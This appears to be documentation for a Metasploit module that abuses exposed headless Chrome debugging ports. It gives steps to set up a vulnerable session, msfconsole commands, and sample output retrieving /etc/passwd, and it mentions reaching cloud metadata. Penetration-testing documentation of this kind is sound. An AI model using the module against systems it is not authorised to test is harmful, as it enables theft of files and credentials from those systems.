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Test Coverage
## Vulnerable Application

This module takes advantage of misconfigured headless chrome sessions and either retrieves a specified file off the remote file system, or makes a web request from the remote machine.

This can be useful for retrieving cloud metadata in certain scenarios.  Primarily this module targets developers.

A vulnerable Headless Chrome session can be started with the following command:

$ google-chrome --remote-debugging-port=9222 --headless --remote-debugging-address=

This will start a webserver running on port 9222 for all network interfaces.

## Verification Steps

1. Start `msfconsole`
2. Execute `auxiliary/gather/chrome_debugger`
3. Execute `set RHOST $REMOTE_ADDRESS`
4. Execute `set RPORT 9222`
5. Execute either `set FILEPATH $FILE_PATH_ON_REMOTE` or `set URL $URL_FROM_REMOTE`
6. Execute `run`

## Options


The file path on the remote you wish to retrieve.


A URL you wish to fetch the contents of from the remote machine.

**Note:** One or the other must be set!

## Scenarios

[*] Attempting Connection to ws://
[*] Opened connection
[*] Attempting to load url file:///etc/passwd
[*] Received Data
[*] Sending request for data
[*] Received Data
[+] Retrieved resource
[*] Auxiliary module execution completed